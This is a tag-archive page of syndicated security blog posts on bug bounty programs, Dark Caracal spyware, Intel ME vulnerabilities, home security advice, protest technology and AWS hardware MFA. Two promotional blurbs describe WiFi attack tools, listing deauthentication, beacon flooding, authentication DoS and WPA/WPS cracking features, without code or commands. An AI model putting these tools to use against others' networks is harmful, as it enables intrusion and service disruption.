Tag Archives: SSID

Setting up bug bounties for success

Post Syndicated from Michal Zalewski original https://lcamtuf.blogspot.com/2018/03/setting-up-bug-bounties-for-success.html

Bug bounties end up in the news with some regularity, usually for the wrong reasons. I’ve been itching to write
about that for a while – but instead of dwelling on the mistakes of the bygone days, I figured it may be better to
talk about some of the ways to get vulnerability rewards right.

What do you get out of bug bounties?

There’s plenty of differing views, but I like to think of such programs
simply as a bid on researchers’ time. In the most basic sense, you get three benefits:

  • Improved ability to detect bugs in production before they become major incidents.
  • A comparatively unbiased feedback loop to help you prioritize and measure other security work.
  • A robust talent pipeline for when you need to hire.

What bug bounties don’t offer?

You don’t get anything resembling a comprehensive security program or a systematic assessment of your platforms.
Researchers end up looking for bugs that offer favorable effort-to-payoff ratios for their skills and given the
very imperfect information they have about your enterprise. In other words, you may end up with a hundred
people looking for XSS and just one person looking for RCE.

Your reward structure can steer them toward the targets and bugs you care about, but it’s difficult to fully
eliminate this inherent skew. There’s only so far you can jack up your top-tier rewards, and only so far you can
go lowering the bottom-tier ones.

Don’t you have to outcompete the black market to get all the “good” bugs?

There is a free market price discovery component to it all: if you’re not getting the engagement you
were hoping for, you should probably consider paying more.

That said, there are going to be researchers who’d rather hurt you than work for you, no matter how much you pay;
you don’t have to win them over, and you don’t have to outspend every authoritarian government or
every crime syndicate. A bug bounty is effective simply if it attracts enough eyeballs to make bugs statistically
harder to find, and reduces the useful lifespan of any zero-days in black market trade. Plus, most
researchers don’t want their work to be used to crack down on dissidents in Egypt or Vietnam.

Another factor is that you’re paying for different things: a black market buyer probably wants a reliable exploit
capable of delivering payloads, and then demands silence for months or years to come; a vendor-run
bug bounty program is usually perfectly happy with a reproducible crash and doesn’t mind a researcher blogging
about their work.

In fact, while money is important, you will probably find out that it’s not enough to retain your top talent;
many folks want bug bounties to be more than a business transaction, and find a lot of value in having a close
relationship with your security team, comparing notes, and growing together. Fostering that partnership can
be more important than adding another $10,000 to your top reward.

How do I prevent it all from going horribly wrong?

Bug bounties are an unfamiliar beast to most lawyers and PR folks, so it’s a natural to be wary and try to plan
for every eventuality with pages and pages of impenetrable rules and fine-print legalese.

This is generally unnecessary: there is a strong self-selection bias, and almost every participant in a
vulnerability reward program will be coming to you in good faith. The more friendly, forthcoming, and
approachable you seem, and the more you treat them like peers, the more likely it is for your relationship to stay
positive. On the flip side, there is no faster way to make enemies than to make a security researcher feel that they
are now talking to a lawyer or to the PR dept.

Most people have strong opinions on disclosure policies; instead of imposing your own views, strive to patch reported bugs
reasonably quickly, and almost every reporter will play along. Demand researchers to cancel conference appearances,
take down blog posts, or sign NDAs, and you will sooner or later end up in the news.

But what if that’s not enough?

As with any business endeavor, mistakes will happen; total risk avoidance is seldom the answer. Learn to sincerely
apologize for mishaps; it’s not a sign of weakness to say “sorry, we messed up”. And you will almost certainly not end
up in the courtroom for doing so.

It’s good to foster a healthy and productive relationship with the community, so that they come to your defense when
something goes wrong. Encouraging people to disclose bugs and talk about their experiences is one way of accomplishing that.

What about extortion?

You should structure your program to naturally discourage bad behavior and make it stand out like a sore thumb.
Require bona fide reports with complete technical details before any reward decision is made by a panel of named peers;
and make it clear that you never demand non-disclosure as a condition of getting a reward.

To avoid researchers accidentally putting themselves in awkward situations, have clear rules around data exfiltration
and lateral movement: assure them that you will always pay based on the worst-case impact of their findings; in exchange,
ask them to stop as soon as they get a shell and never access any data that isn’t their own.

So… are there any downsides?

Yep. Other than souring up your relationship with the community if you implement your program wrong, the other consideration
is that bug bounties tend to generate a lot of noise from well-meaning but less-skilled researchers.

When this happens, do not get frustrated and do not penalize such participants; instead, help them grow. Consider
publishing educational articles, giving advice on how to investigate and structure reports, or
offering free workshops every now and then.

The other downside is cost; although bug bounties tend to offer far more bang for your buck than your average penetration
test, they are more random. The annual expenses tend to be fairly predictable, but there is always
some possibility of having to pay multiple top-tier rewards in rapid succession. This is the kind of uncertainty that
many mid-level budget planners react badly to.

Finally, you need to be able to fix the bugs you receive. It would be nuts to prefer to not know about the
vulnerabilities in the first place – but once you invite the research, the clock starts ticking and you need to
ship fixes reasonably fast.

So… should I try it?

There are folks who enthusiastically advocate for bug bounties in every conceivable situation, and people who dislike them
with fierce passion; both sentiments are usually strongly correlated with the line of business they are in.

In reality, bug bounties are not a cure-all, and there are some ways to make them ineffectual or even dangerous.
But they are not as risky or expensive as most people suspect, and when done right, they can actually be fun for your
team, too. You won’t know for sure until you try.

Dark Caracal: Global Espionage Malware from Lebanon

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/01/dark_caracal_gl.html

The EFF and Lookout are reporting on a new piece of spyware operating out of Lebanon. It primarily targets mobile devices compromised by fake secure messaging clients like Signal and WhatsApp.

From the Lookout announcement:

Dark Caracal has operated a series of multi-platform campaigns starting from at least January 2012, according to our research. The campaigns span across 21+ countries and thousands of victims. Types of data stolen include documents, call records, audio recordings, secure messaging client content, contact information, text messages, photos, and account data. We believe this actor is operating their campaigns from a building belonging to the Lebanese General Security Directorate (GDGS) in Beirut.

It looks like a complex infrastructure that’s been well-developed, and continually upgraded and maintained. It appears that a cyberweapons arms manufacturer is selling this tool to different countries. From the full report:

Dark Caracal is using the same infrastructure as was previously seen in the Operation Manul campaign, which targeted journalists, lawyers, and dissidents critical of the government of Kazakhstan.

There’s a lot in the full report. It’s worth reading.

Three news articles.

Hijacker – Reaver For Android Wifi Hacker App

Post Syndicated from Darknet original https://www.darknet.org.uk/2018/01/hijacker-reaver-android-wifi-hacker-app/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

Hijacker – Reaver For Android Wifi Hacker App

Hijacker is a native GUI which provides Reaver for Android along with Aircrack-ng, Airodump-ng and MDK3 making it a powerful Wifi hacker app.

It offers a simple and easy UI to use these tools without typing commands in a console and copy & pasting MAC addresses.

Features of Hijacker Reaver For Android Wifi Hacker App
Information Gathering

  • View a list of access points and stations (clients) around you (even hidden ones)
  • View the activity of a specific network (by measuring beacons and data packets) and its clients
  • Statistics about access points and stations
  • See the manufacturer of a device (AP or station) from the OUI database
  • See the signal power of devices and filter the ones that are closer to you
  • Save captured packets in .cap file

Reaver for Android Wifi Cracker Attacks

  • Deauthenticate all the clients of a network (either targeting each one or without specific target)
  • Deauthenticate a specific client from the network it’s connected
  • MDK3 Beacon Flooding with custom options and SSID list
  • MDK3 Authentication DoS for a specific network or to every nearby AP
  • Capture a WPA handshake or gather IVs to crack a WEP network
  • Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)

Other Wifi Hacker App Features

  • Leave the app running in the background, optionally with a notification
  • Copy commands or MAC addresses to clipboard
  • Includes the required tools, no need for manual installation
  • Includes the nexmon driver and management utility for BCM4339 devices
  • Set commands to enable and disable monitor mode automatically
  • Crack .cap files with a custom wordlist
  • Create custom actions and run them on an access point or a client easily
  • Sort and filter Access Points and Stations with many parameters
  • Export all gathered information to a file
  • Add a persistent alias to a device (by MAC) for easier identification

Requirements to Crack Wifi Password with Android

This application requires an ARM Android device with an internal wireless adapter that supports Monitor Mode.

Read the rest of Hijacker – Reaver For Android Wifi Hacker App now! Only available at Darknet.

coWPAtty Download – Audit Pre-shared WPA Keys

Post Syndicated from Darknet original https://www.darknet.org.uk/2017/12/cowpatty-audit-pre-shared-wpa-keys/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

coWPAtty Download – Audit Pre-shared WPA Keys

coWPAtty is a C-based tool for running a brute-force dictionary attack against WPA-PSK and audit pre-shared WPA keys.

If you are auditing WPA-PSK networks, you can use this tool to identify weak passphrases that were used to generate the PMK. Supply a libpcap capture file that includes the 4-way handshake, a dictionary file of passphrases to guess with, and the SSID for the network.

What is coWPAtty?

coWPAtty is the implementation of an offline dictionary attack against WPA/WPA2 networks using PSK-based authentication (e.g.

Read the rest of coWPAtty Download – Audit Pre-shared WPA Keys now! Only available at Darknet.

Potential impact of the Intel ME vulnerability

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/49611.html

(Note: this is my personal opinion based on public knowledge around this issue. I have no knowledge of any non-public details of these vulnerabilities, and this should not be interpreted as the position or opinion of my employer)

Intel’s Management Engine (ME) is a small coprocessor built into the majority of Intel CPUs[0]. Older versions were based on the ARC architecture[1] running an embedded realtime operating system, but from version 11 onwards they’ve been small x86 cores running Minix. The precise capabilities of the ME have not been publicly disclosed, but it is at minimum capable of interacting with the network[2], display[3], USB, input devices and system flash. In other words, software running on the ME is capable of doing a lot, without requiring any OS permission in the process.

Back in May, Intel announced a vulnerability in the Advanced Management Technology (AMT) that runs on the ME. AMT offers functionality like providing a remote console to the system (so IT support can connect to your system and interact with it as if they were physically present), remote disk support (so IT support can reinstall your machine over the network) and various other bits of system management. The vulnerability meant that it was possible to log into systems with enabled AMT with an empty authentication token, making it possible to log in without knowing the configured password.

This vulnerability was less serious than it could have been for a couple of reasons – the first is that “consumer”[4] systems don’t ship with AMT, and the second is that AMT is almost always disabled (Shodan found only a few thousand systems on the public internet with AMT enabled, out of many millions of laptops). I wrote more about it here at the time.

How does this compare to the newly announced vulnerabilities? Good question. Two of the announced vulnerabilities are in AMT. The previous AMT vulnerability allowed you to bypass authentication, but restricted you to doing what AMT was designed to let you do. While AMT gives an authenticated user a great deal of power, it’s also designed with some degree of privacy protection in mind – for instance, when the remote console is enabled, an animated warning border is drawn on the user’s screen to alert them.

This vulnerability is different in that it allows an authenticated attacker to execute arbitrary code within the AMT process. This means that the attacker shouldn’t have any capabilities that AMT doesn’t, but it’s unclear where various aspects of the privacy protection are implemented – for instance, if the warning border is implemented in AMT rather than in hardware, an attacker could duplicate that functionality without drawing the warning. If the USB storage emulation for remote booting is implemented as a generic USB passthrough, the attacker could pretend to be an arbitrary USB device and potentially exploit the operating system through bugs in USB device drivers. Unfortunately we don’t currently know.

Note that this exploit still requires two things – first, AMT has to be enabled, and second, the attacker has to be able to log into AMT. If the attacker has physical access to your system and you don’t have a BIOS password set, they will be able to enable it – however, if AMT isn’t enabled and the attacker isn’t physically present, you’re probably safe. But if AMT is enabled and you haven’t patched the previous vulnerability, the attacker will be able to access AMT over the network without a password and then proceed with the exploit. This is bad, so you should probably (1) ensure that you’ve updated your BIOS and (2) ensure that AMT is disabled unless you have a really good reason to use it.

The AMT vulnerability applies to a wide range of versions, everything from version 6 (which shipped around 2008) and later. The other vulnerability that Intel describe is restricted to version 11 of the ME, which only applies to much more recent systems. This vulnerability allows an attacker to execute arbitrary code on the ME, which means they can do literally anything the ME is able to do. This probably also means that they are able to interfere with any other code running on the ME. While AMT has been the most frequently discussed part of this, various other Intel technologies are tied to ME functionality.

Intel’s Platform Trust Technology (PTT) is a software implementation of a Trusted Platform Module (TPM) that runs on the ME. TPMs are intended to protect access to secrets and encryption keys and record the state of the system as it boots, making it possible to determine whether a system has had part of its boot process modified and denying access to the secrets as a result. The most common usage of TPMs is to protect disk encryption keys – Microsoft Bitlocker defaults to storing its encryption key in the TPM, automatically unlocking the drive if the boot process is unmodified. In addition, TPMs support something called Remote Attestation (I wrote about that here), which allows the TPM to provide a signed copy of information about what the system booted to a remote site. This can be used for various purposes, such as not allowing a compute node to join a cloud unless it’s booted the correct version of the OS and is running the latest firmware version. Remote Attestation depends on the TPM having a unique cryptographic identity that is tied to the TPM and inaccessible to the OS.

PTT allows manufacturers to simply license some additional code from Intel and run it on the ME rather than having to pay for an additional chip on the system motherboard. This seems great, but if an attacker is able to run code on the ME then they potentially have the ability to tamper with PTT, which means they can obtain access to disk encryption secrets and circumvent Bitlocker. It also means that they can tamper with Remote Attestation, “attesting” that the system booted a set of software that it didn’t or copying the keys to another system and allowing that to impersonate the first. This is, uh, bad.

Intel also recently announced Intel Online Connect, a mechanism for providing the functionality of security keys directly in the operating system. Components of this are run on the ME in order to avoid scenarios where a compromised OS could be used to steal the identity secrets – if the ME is compromised, this may make it possible for an attacker to obtain those secrets and duplicate the keys.

It’s also not entirely clear how much of Intel’s Secure Guard Extensions (SGX) functionality depends on the ME. The ME does appear to be required for SGX Remote Attestation (which allows an application using SGX to prove to a remote site that it’s the SGX app rather than something pretending to be it), and again if those secrets can be extracted from a compromised ME it may be possible to compromise some of the security assumptions around SGX. Again, it’s not clear how serious this is because it’s not publicly documented.

Various other things also run on the ME, including stuff like video DRM (ensuring that high resolution video streams can’t be intercepted by the OS). It may be possible to obtain encryption keys from a compromised ME that allow things like Netflix streams to be decoded and dumped. From a user privacy or security perspective, these things seem less serious.

The big problem at the moment is that we have no idea what the actual process of compromise is. Intel state that it requires local access, but don’t describe what kind. Local access in this case could simply require the ability to send commands to the ME (possible on any system that has the ME drivers installed), could require direct hardware access to the exposed ME (which would require either kernel access or the ability to install a custom driver) or even the ability to modify system flash (possible only if the attacker has physical access and enough time and skill to take the system apart and modify the flash contents with an SPI programmer). The other thing we don’t know is whether it’s possible for an attacker to modify the system such that the ME is persistently compromised or whether it needs to be re-compromised every time the ME reboots. Note that even the latter is more serious than you might think – the ME may only be rebooted if the system loses power completely, so even a “temporary” compromise could affect a system for a long period of time.

It’s also almost impossible to determine if a system is compromised. If the ME is compromised then it’s probably possible for it to roll back any firmware updates but still report that it’s been updated, giving admins a false sense of security. The only way to determine for sure would be to dump the system flash and compare it to a known good image. This is impractical to do at scale.

So, overall, given what we know right now it’s hard to say how serious this is in terms of real world impact. It’s unlikely that this is the kind of vulnerability that would be used to attack individual end users – anyone able to compromise a system like this could just backdoor your browser instead with much less effort, and that already gives them your banking details. The people who have the most to worry about here are potential targets of skilled attackers, which means activists, dissidents and companies with interesting personal or business data. It’s hard to make strong recommendations about what to do here without more insight into what the vulnerability actually is, and we may not know that until this presentation next month.

Summary: Worst case here is terrible, but unlikely to be relevant to the vast majority of users.

[0] Earlier versions of the ME were built into the motherboard chipset, but as portions of that were incorporated onto the CPU package the ME followed
[1] A descendent of the SuperFX chip used in Super Nintendo cartridges such as Starfox, because why not
[2] Without any OS involvement for wired ethernet and for wireless networks in the system firmware, but requires OS support for wireless access once the OS drivers have loaded
[3] Assuming you’re using integrated Intel graphics
[4] “Consumer” is a bit of a misnomer here – “enterprise” laptops like Thinkpads ship with AMT, but are often bought by consumers.

comment count unavailable comments

Your Holiday Cybersecurity Guide

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/11/your-holiday-cybersecurity-guide.html

Many of us are visiting parents/relatives this Thanksgiving/Christmas, and will have an opportunity to help our them with cybersecurity issues. I thought I’d write up a quick guide of the most important things.

1. Stop them from reusing passwords

By far the biggest threat to average people is that they re-use the same password across many websites, so that when one website gets hacked, all their accounts get hacked.
To demonstrate the problem, go to haveibeenpwned.com and enter the email address of your relatives. This will show them a number of sites where their password has already been stolen, like LinkedIn, Adobe, etc. That should convince them of the severity of the problem.

They don’t need a separate password for every site. You don’t care about the majority of website whether you get hacked. Use a common password for all the meaningless sites. You only need unique passwords for important accounts, like email, Facebook, and Twitter.

Write down passwords and store them in a safe place. Sure, it’s a common joke that people in offices write passwords on Post-It notes stuck on their monitors or under their keyboards. This is a common security mistake, but that’s only because the office environment is widely accessible. Your home isn’t, and there’s plenty of places to store written passwords securely, such as in a home safe. Even if it’s just a desk drawer, such passwords are safe from hackers, because they aren’t on a computer.

Write them down, with pen and paper. Don’t put them in a MyPasswords.doc, because when a hacker breaks in, they’ll easily find that document and easily hack your accounts.

You might help them out with getting a password manager, or two-factor authentication (2FA). Good 2FA like YubiKey will stop a lot of phishing threats. But this is difficult technology to learn, and of course, you’ll be on the hook for support issues, such as when they lose the device. Thus, while 2FA is best, I’m only recommending pen-and-paper to store passwords. (AccessNow has a guide, though I think YubiKey/U2F keys for Facebook and GMail are the best).

2. Lock their phone (passcode, fingerprint, faceprint)
You’ll lose your phone at some point. It has the keys all all your accounts, like email and so on. With your email, phones thieves can then reset passwords on all your other accounts. Thus, it’s incredibly important to lock the phone.

Apple has made this especially easy with fingerprints (and now faceprints), so there’s little excuse not to lock the phone.

Note that Apple iPhones are the most secure. I give my mother my old iPhones so that they will have something secure.

My mom demonstrates a problem you’ll have with the older generation: she doesn’t reliably have her phone with her, and charged. She’s the opposite of my dad who religiously slaved to his phone. Even a small change to make her lock her phone means it’ll be even more likely she won’t have it with her when you need to call her.

3. WiFi (WPA)
Make sure their home WiFi is WPA encrypted. It probably already is, but it’s worthwhile checking.

The password should be written down on the same piece of paper as all the other passwords. This is importance. My parents just moved, Comcast installed a WiFi access point for them, and they promptly lost the piece of paper. When I wanted to debug some thing on their network today, they didn’t know the password, and couldn’t find the paper. Get that password written down in a place it won’t get lost!

Discourage them from extra security features like “SSID hiding” and/or “MAC address filtering”. They provide no security benefit, and actually make security worse. It means a phone has to advertise the SSID when away from home, and it makes MAC address randomization harder, both of which allows your privacy to be tracked.

If they have a really old home router, you should probably replace it, or at least update the firmware. A lot of old routers have hacks that allow hackers (like me masscaning the Internet) to easily break in.

4. Ad blockers or Brave

Most of the online tricks that will confuse your older parents will come via advertising, such as popups claiming “You are infected with a virus, click here to clean it”. Installing an ad blocker in the browser, such as uBlock Origin, stops most all this nonsense.

For example, here’s a screenshot of going to the “Speedtest” website to test the speed of my connection (I took this on the plane on the way home for Thanksgiving). Ignore the error (plane’s firewall Speedtest) — but instead look at the advertising banner across the top of the page insisting you need to download a browser extension. This is tricking you into installing malware — the ad appears as if it’s a message from Speedtest, it’s not. Speedtest is just selling advertising and has no clue what the banner says. This sort of thing needs to be blocked — it fools even the technologically competent.

uBlock Origin for Chrome is the one I use. Another option is to replace their browser with Brave, a browser that blocks ads, but at the same time, allows micropayments to support websites you want to support. I use Brave on my iPhone.
A side benefit of ad blockers or Brave is that web surfing becomes much faster, since you aren’t downloading all this advertising. The smallest NYtimes story is 15 megabytes in size due to all the advertisements, for example.

5. Cloud Backups
Do backups, in the cloud. It’s a good idea in general, especially with the threat of ransomware these days.

In particular, consider your photos. Over time, they will be lost, because people make no effort to keep track of them. All hard drives will eventually crash, deleting your photos. Sure, a few key ones are backed up on Facebook for life, but the rest aren’t.
There are so many excellent online backup services out there, like DropBox and Backblaze. Or, you can use the iCloud feature that Apple provides. My favorite is Microsoft’s: I already pay $99 a year for Office 365 subscription, and it comes with 1-terabyte of online storage.

6. Separate email accounts
You should have three email accounts: work, personal, and financial.

First, you really need to separate your work account from personal. The IT department is already getting misdirected emails with your spouse/lover that they don’t want to see. Any conflict with your work, such as getting fired, gives your private correspondence to their lawyers.

Second, you need a wholly separate account for financial stuff, like Amazon.com, your bank, PayPal, and so on. That prevents confusion with phishing attacks.

Consider this warning today:

If you had split accounts, you could safely ignore this. The USPS would only know your financial email account, which gets no phishing attacks, because it’s not widely known. When your receive the phishing attack on your personal email, you ignore it, because you know the USPS doesn’t know your personal email account.

Phishing emails are so sophisticated that even experts can’t tell the difference. Splitting financial from personal emails makes it so you don’t have to tell the difference — anything financial sent to personal email can safely be ignored.

7. Deauth those apps!

Twitter user @tompcoleman comments that we also need deauth apps.
Social media sites like Facebook, Twitter, and Google encourage you to enable “apps” that work their platforms, often demanding privileges to generate messages on your behalf. The typical scenario is that you use them only once or twice and forget about them.
A lot of them are hostile. For example, my niece’s twitter account would occasional send out advertisements, and she didn’t know why. It’s because a long time ago, she enabled an app with the permission to send tweets for her. I had to sit down and get rid of most of her apps.
Now would be a good time to go through your relatives Facebook, Twitter, and Google/GMail and disable those apps. Don’t be a afraid to be ruthless — they probably weren’t using them anyway. Some will still be necessary. For example, Twitter for iPhone shows up in the list of Twitter apps. The URL for editing these apps for Twitter is https://twitter.com/settings/applications. Google link is here (thanks @spextr). I don’t know of simple URLs for Facebook, but you should find it somewhere under privacy/security settings.
Update: Here’s a more complete guide for a even more social media services.
https://www.permissions.review/

8. Up-to-date software? maybe

I put this last because it can be so much work.

You should install the latest OS (Windows 10, macOS High Sierra), and also turn on automatic patching.

But remember it may not be worth the huge effort involved. I want my parents to be secure — but no so secure I have to deal with issues.

For example, when my parents updated their HP Print software, the icon on the desktop my mom usually uses to scan things in from the printer disappeared, and needed me to spend 15 minutes with her helping find the new way to access the software.
However, I did get my mom a new netbook to travel with instead of the old WinXP one. I want to get her a Chromebook, but she doesn’t want one.
For iOS, you can probably make sure their phones have the latest version without having these usability problems.

Conclusion

You can’t solve every problem for your relatives, but these are the more critical ones.

Book Review: Twitter and Tear Gas, by Zeynep Tufekci

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/07/book_review_twi.html

There are two opposing models of how the Internet has changed protest movements. The first is that the Internet has made protesters mightier than ever. This comes from the successful revolutions in Tunisia (2010-11), Egypt (2011), and Ukraine (2013). The second is that it has made them more ineffectual. Derided as “slacktivism” or “clicktivism,” the ease of action without commitment can result in movements like Occupy petering out in the US without any obvious effects. Of course, the reality is more nuanced, and Zeynep Tufekci teases that out in her new book Twitter and Tear Gas.

Tufekci is a rare interdisciplinary figure. As a sociologist, programmer, and ethnographer, she studies how technology shapes society and drives social change. She has a dual appointment in both the School of Information Science and the Department of Sociology at University of North Carolina at Chapel Hill, and is a Faculty Associate at the Berkman Klein Center for Internet and Society at Harvard University. Her regular New York Times column on the social impacts of technology is a must-read.

Modern Internet-fueled protest movements are the subjects of Twitter and Tear Gas. As an observer, writer, and participant, Tufekci examines how modern protest movements have been changed by the Internet­ — and what that means for protests going forward. Her book combines her own ethnographic research and her usual deft analysis, with the research of others and some big data analysis from social media outlets. The result is a book that is both insightful and entertaining, and whose lessons are much broader than the book’s central topic.

“The Power and Fragility of Networked Protest” is the book’s subtitle. The power of the Internet as a tool for protest is obvious: it gives people newfound abilities to quickly organize and scale. But, according to Tufekci, it’s a mistake to judge modern protests using the same criteria we used to judge pre-Internet protests. The 1963 March on Washington might have culminated in hundreds of thousands of people listening to Martin Luther King Jr. deliver his “I Have a Dream” speech, but it was the culmination of a multi-year protest effort and the result of six months of careful planning made possible by that sustained effort. The 2011 protests in Cairo came together in mere days because they could be loosely coordinated on Facebook and Twitter.

That’s the power. Tufekci describes the fragility by analogy. Nepalese Sherpas assist Mt. Everest climbers by carrying supplies, laying out ropes and ladders, and so on. This means that people with limited training and experience can make the ascent, which is no less dangerous — to sometimes disastrous results. Says Tufekci: “The Internet similarly allows networked movements to grow dramatically and rapidly, but without prior building of formal or informal organizational and other collective capacities that could prepare them for the inevitable challenges they will face and give them the ability to respond to what comes next.” That makes them less able to respond to government counters, change their tactics­ — a phenomenon Tufekci calls “tactical freeze” — make movement-wide decisions, and survive over the long haul.

Tufekci isn’t arguing that modern protests are necessarily less effective, but that they’re different. Effective movements need to understand these differences, and leverage these new advantages while minimizing the disadvantages.

To that end, she develops a taxonomy for talking about social movements. Protests are an example of a “signal” that corresponds to one of several underlying “capacities.” There’s narrative capacity: the ability to change the conversation, as Black Lives Matter did with police violence and Occupy did with wealth inequality. There’s disruptive capacity: the ability to stop business as usual. An early Internet example is the 1999 WTO protests in Seattle. And finally, there’s electoral or institutional capacity: the ability to vote, lobby, fund raise, and so on. Because of various “affordances” of modern Internet technologies, particularly social media, the same signal — a protest of a given size — reflects different underlying capacities.

This taxonomy also informs government reactions to protest movements. Smart responses target attention as a resource. The Chinese government responded to 2015 protesters in Hong Kong by not engaging with them at all, denying them camera-phone videos that would go viral and attract the world’s attention. Instead, they pulled their police back and waited for the movement to die from lack of attention.

If this all sounds dry and academic, it’s not. Twitter and Tear Gasis infused with a richness of detail stemming from her personal participation in the 2013 Gezi Park protests in Turkey, as well as personal on-the-ground interviews with protesters throughout the Middle East — particularly Egypt and her native Turkey — Zapatistas in Mexico, WTO protesters in Seattle, Occupy participants worldwide, and others. Tufekci writes with a warmth and respect for the humans that are part of these powerful social movements, gently intertwining her own story with the stories of others, big data, and theory. She is adept at writing for a general audience, and­despite being published by the intimidating Yale University Press — her book is more mass-market than academic. What rigor is there is presented in a way that carries readers along rather than distracting.

The synthesist in me wishes Tufekci would take some additional steps, taking the trends she describes outside of the narrow world of political protest and applying them more broadly to social change. Her taxonomy is an important contribution to the more-general discussion of how the Internet affects society. Furthermore, her insights on the networked public sphere has applications for understanding technology-driven social change in general. These are hard conversations for society to have. We largely prefer to allow technology to blindly steer society or — in some ways worse — leave it to unfettered for-profit corporations. When you’re reading Twitter and Tear Gas, keep current and near-term future technological issues such as ubiquitous surveillance, algorithmic discrimination, and automation and employment in mind. You’ll come away with new insights.

Tufekci twice quotes historian Melvin Kranzberg from 1985: “Technology is neither good nor bad; nor is it neutral.” This foreshadows her central message. For better or worse, the technologies that power the networked public sphere have changed the nature of political protest as well as government reactions to and suppressions of such protest.

I have long characterized our technological future as a battle between the quick and the strong. The quick — dissidents, hackers, criminals, marginalized groups — are the first to make use of a new technology to magnify their power. The strong are slower, but have more raw power to magnify. So while protesters are the first to use Facebook to organize, the governments eventually figure out how to use Facebook to track protesters. It’s still an open question who will gain the upper hand in the long term, but Tufekci’s book helps us understand the dynamics at work.

This essay originally appeared on Vice Motherboard.

The book on Amazon.com.

The Quick vs. the Strong: Commentary on Cory Doctorow’s Walkaway

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/05/the_quick_vs_th.html

Technological advances change the world. That’s partly because of what they are, but even more because of the social changes they enable. New technologies upend power balances. They give groups new capabilities, increased effectiveness, and new defenses. The Internet decades have been a never-ending series of these upendings. We’ve seen existing industries fall and new industries rise. We’ve seen governments become more powerful in some areas and less in others. We’ve seen the rise of a new form of governance: a multi-stakeholder model where skilled individuals can have more power than multinational corporations or major governments.

Among the many power struggles, there is one type I want to particularly highlight: the battles between the nimble individuals who start using a new technology first, and the slower organizations that come along later.

In general, the unempowered are the first to benefit from new technologies: hackers, dissidents, marginalized groups, criminals, and so on. When they first encountered the Internet, it was transformative. Suddenly, they had access to technologies for dissemination, coordination, organization, and action — things that were impossibly hard before. This can be incredibly empowering. In the early decades of the Internet, we saw it in the rise of Usenet discussion forums and special-interest mailing lists, in how the Internet routed around censorship, and how Internet governance bypassed traditional government and corporate models. More recently, we saw it in the SOPA/PIPA debate of 2011-12, the Gezi protests in Turkey and the various “color” revolutions, and the rising use of crowdfunding. These technologies can invert power dynamics, even in the presence of government surveillance and censorship.

But that’s just half the story. Technology magnifies power in general, but the rates of adoption are different. Criminals, dissidents, the unorganized — all outliers — are more agile. They can make use of new technologies faster, and can magnify their collective power because of it. But when the already-powerful big institutions finally figured out how to use the Internet, they had more raw power to magnify.

This is true for both governments and corporations. We now know that governments all over the world are militarizing the Internet, using it for surveillance, censorship, and propaganda. Large corporations are using it to control what we can do and see, and the rise of winner-take-all distribution systems only exacerbates this.

This is the fundamental tension at the heart of the Internet, and information-based technology in general. The unempowered are more efficient at leveraging new technology, while the powerful have more raw power to leverage. These two trends lead to a battle between the quick and the strong: the quick who can make use of new power faster, and the strong who can make use of that same power more effectively.

This battle is playing out today in many different areas of information technology. You can see it in the security vs. surveillance battles between criminals and the FBI, or dissidents and the Chinese government. You can see it in the battles between content pirates and various media organizations. You can see it where social-media giants and Internet-commerce giants battle against new upstarts. You can see it in politics, where the newer Internet-aware organizations fight with the older, more established, political organizations. You can even see it in warfare, where a small cadre of military can keep a country under perpetual bombardment — using drones — with no risk to the attackers.

This battle is fundamental to Cory Doctorow’s new novel Walkaway. Our heroes represent the quick: those who have checked out of traditional society, and thrive because easy access to 3D printers enables them to eschew traditional notions of property. Their enemy is the strong: the traditional government institutions that exert their power mostly because they can. This battle rages through most of the book, as the quick embrace ever-new technologies and the strong struggle to catch up.

It’s easy to root for the quick, both in Doctorow’s book and in the real world. And while I’m not going to give away Doctorow’s ending — and I don’t know enough to predict how it will play out in the real world — right now, trends favor the strong.

Centralized infrastructure favors traditional power, and the Internet is becoming more centralized. This is true both at the endpoints, where companies like Facebook, Apple, Google, and Amazon control much of how we interact with information. It’s also true in the middle, where companies like Comcast increasingly control how information gets to us. It’s true in countries like Russia and China that increasingly legislate their own national agenda onto their pieces of the Internet. And it’s even true in countries like the US and the UK, that increasingly legislate more government surveillance capabilities.

At the 1996 World Economic Forum, cyber-libertarian John Perry Barlow issued his “Declaration of the Independence of Cyberspace,” telling the assembled world leaders and titans of Industry: “You have no moral right to rule us, nor do you possess any methods of enforcement that we have true reason to fear.” Many of us believed him a scant 20 years ago, but today those words ring hollow.

But if history is any guide, these things are cyclic. In another 20 years, even newer technologies — both the ones Doctorow focuses on and the ones no one can predict — could easily tip the balance back in favor of the quick. Whether that will result in more of a utopia or a dystopia depends partly on these technologies, but even more on the social changes resulting from these technologies. I’m short-term pessimistic but long-term optimistic.

This essay previously appeared on Crooked Timber.

Announcing the Availability of Hardware Multi-Factor Authentication in the AWS GovCloud (US) Region

Post Syndicated from Craig Liebendorfer original https://aws.amazon.com/blogs/security/announcing-the-availability-of-hardware-multi-factor-authentication-in-the-aws-govcloud-us-region/

AWS GovCloud (US) Region image

Hardware multi-factor authentication (MFA) is now available in the AWS GovCloud (US) Region to help strengthen data security while giving you control over token keys that have access to your data. MFA is a best practice that adds an extra layer of protection on top of users’ user names and passwords.

These token keys that are specific to the AWS GovCloud (US) Region are distributed by SurePassID, a third-party digital security company, and implement the Initiative for Open Authentication Time-Based One-Time Password (OATH TOTP) standard. SurePassID tokens are available for purchase on Amazon.com.

For more information about hardware MFA in the AWS GovCloud (US) Region, see the AWS Public Sector Blog post.

– Craig

Surveillance and our Insecure Infrastructure

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/04/surveillance_an_2.html

Since Edward Snowden revealed to the world the extent of the NSA’s global surveillance network, there has been a vigorous debate in the technological community about what its limits should be.

Less discussed is how many of these same surveillance techniques are used by other — smaller and poorer — more totalitarian countries to spy on political opponents, dissidents, human rights defenders; the press in Toronto has documented some of the many abuses, by countries like Ethiopia , the UAE, Iran, Syria, Kazakhstan , Sudan, Ecuador, Malaysia, and China.

That these countries can use network surveillance technologies to violate human rights is a shame on the world, and there’s a lot of blame to go around.

